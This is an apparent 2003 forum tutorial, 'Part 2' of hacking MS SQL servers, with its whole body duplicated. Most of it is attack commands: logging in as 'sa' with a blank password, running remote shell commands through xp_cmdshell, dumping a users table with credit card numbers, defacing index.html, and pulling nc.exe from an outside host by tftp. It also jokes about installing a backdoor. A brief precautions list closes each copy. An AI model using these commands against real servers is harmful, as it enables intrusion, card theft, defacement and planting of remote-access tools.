CourtneyDS
May 24th, 2003, 10:24 PM
Part 2
C:>osql.exe -?
osql: unknown option ?
usage: osql [-U login id] [-P password]
[-S server] [-H hostname] [-E trusted connection]
[-d use database name] [-l login timeout] [-t query timeout]
[-h headers] [-s colseparator] [-w columnwidth]
[-a packetsize] [-e echo input] [-I Enable Quoted Identifiers]
[-L list servers] [-c cmdend]
[-q "cmdline query"] [-Q "cmdline query" and exit]
[-n remove numbering] [-m errorlevel]
[-r msgs to stderr] [-V severitylevel]
[-i inputfile] [-o outputfile]
[-p print statistics] [-b On error batch abort]
[-O use Old ISQL behavior disables the following]
<EOF> batch processing
Auto console width scaling
Wide messages
default errorlevel is -1 vs 1
[-? show syntax summary]
------------------------------------------------
Well.. this displays the help of the osql tool ... Its clear from the help what we have to do now. Type
C:\> osql.exe -S 123.321.123.3 -U sa -P " "
1>
Thats what we get if we login successfully else we will get an error message as login failed for user "sa" ...
Now if you want to execute any command on the remote machine then just use the "xp_cmdshell" default stored procedure ...
C:\> osql.exe -S 123.321.123.3 -U sa -P '' -Q "exec master..xp_cmdshell ‘dir >dir.txt’"
I would prefer to use -Q option instead of -q because it exits after executing the query ... In the same manner we can execute any command on the remote machine ... We can even upload or download any files on/from the remote machine ...
A smart attacker will install a backdoor on the machine to gain access to in future also :). Now as I had explained earlier we can use the "information_schema.tables" to get the list of tables and contents of it ...
C:\> osql.exe -S 123.321.123.3 -U sa -P " " -Q "select * from information_schema.tables"
And getting table names look for some table like login or accounts or users or something like that which seems to contain some important info like credit card no. etc.
C:\> osql.exe -S 123.321.123.3 -U sa -P " " -Q "select * from users"
And
C:\> osql.exe -S 123.321.123.3 -U sa -P " " -Q "select username, creditcard, expdate from users"
Output:
Username Some Numbers ? expdate
----------- ------------ ----------
David Lindon 1234567890987654 2004-10-03 00:00:00.000
Overlord 0987654321234567 2004-07-02 00:00:00.000
jasynder 2312345678909878 2004-08-07 00:00:00.000
Eyelfixit 3456789012345678 2004-03-02 00:00:00.000
Write something in index.html file ?
C:\> osql.exe -S 123.321.123.3 -U sa -P " " -Q "exec master..xp_cmdshell ‘echo defaced by Chintan > C:\inetpub\wwwroot\index.html’"
Want to upload any file on the remote system ...
C:\> osql.exe -S 198.188.178.1 -U sa -P " " -Q "exec master..xp_cmdshell ‘tftp 234.432.12.21 GET nc.exe c:\nc.exe’"
Precautionay measures
---------------------------
<*> Change the default password for sa.
<*> Delete all the default stored procedures.
<*> Filter out all the characters like ',",--,:,etc.
<*> Keep upto date with patches
<*> Block the ports 1433/1434 MS SQL and 1521 (oracle) ports using firewalls ...
Sincerely
Courtney_DS
C:>osql.exe -?
osql: unknown option ?
usage: osql [-U login id] [-P password]
[-S server] [-H hostname] [-E trusted connection]
[-d use database name] [-l login timeout] [-t query timeout]
[-h headers] [-s colseparator] [-w columnwidth]
[-a packetsize] [-e echo input] [-I Enable Quoted Identifiers]
[-L list servers] [-c cmdend]
[-q "cmdline query"] [-Q "cmdline query" and exit]
[-n remove numbering] [-m errorlevel]
[-r msgs to stderr] [-V severitylevel]
[-i inputfile] [-o outputfile]
[-p print statistics] [-b On error batch abort]
[-O use Old ISQL behavior disables the following]
<EOF> batch processing
Auto console width scaling
Wide messages
default errorlevel is -1 vs 1
[-? show syntax summary]
------------------------------------------------
Well.. this displays the help of the osql tool ... Its clear from the help what we have to do now. Type
C:\> osql.exe -S 123.321.123.3 -U sa -P " "
1>
Thats what we get if we login successfully else we will get an error message as login failed for user "sa" ...
Now if you want to execute any command on the remote machine then just use the "xp_cmdshell" default stored procedure ...
C:\> osql.exe -S 123.321.123.3 -U sa -P '' -Q "exec master..xp_cmdshell ‘dir >dir.txt’"
I would prefer to use -Q option instead of -q because it exits after executing the query ... In the same manner we can execute any command on the remote machine ... We can even upload or download any files on/from the remote machine ...
A smart attacker will install a backdoor on the machine to gain access to in future also :). Now as I had explained earlier we can use the "information_schema.tables" to get the list of tables and contents of it ...
C:\> osql.exe -S 123.321.123.3 -U sa -P " " -Q "select * from information_schema.tables"
And getting table names look for some table like login or accounts or users or something like that which seems to contain some important info like credit card no. etc.
C:\> osql.exe -S 123.321.123.3 -U sa -P " " -Q "select * from users"
And
C:\> osql.exe -S 123.321.123.3 -U sa -P " " -Q "select username, creditcard, expdate from users"
Output:
Username Some Numbers ? expdate
----------- ------------ ----------
David Lindon 1234567890987654 2004-10-03 00:00:00.000
Overlord 0987654321234567 2004-07-02 00:00:00.000
jasynder 2312345678909878 2004-08-07 00:00:00.000
Eyelfixit 3456789012345678 2004-03-02 00:00:00.000
Write something in index.html file ?
C:\> osql.exe -S 123.321.123.3 -U sa -P " " -Q "exec master..xp_cmdshell ‘echo defaced by Chintan > C:\inetpub\wwwroot\index.html’"
Want to upload any file on the remote system ...
C:\> osql.exe -S 198.188.178.1 -U sa -P " " -Q "exec master..xp_cmdshell ‘tftp 234.432.12.21 GET nc.exe c:\nc.exe’"
Precautionay measures
---------------------------
<*> Change the default password for sa.
<*> Delete all the default stored procedures.
<*> Filter out all the characters like ',",--,:,etc.
<*> Keep upto date with patches
<*> Block the ports 1433/1434 MS SQL and 1521 (oracle) ports using firewalls ...
Sincerely
Courtney_DS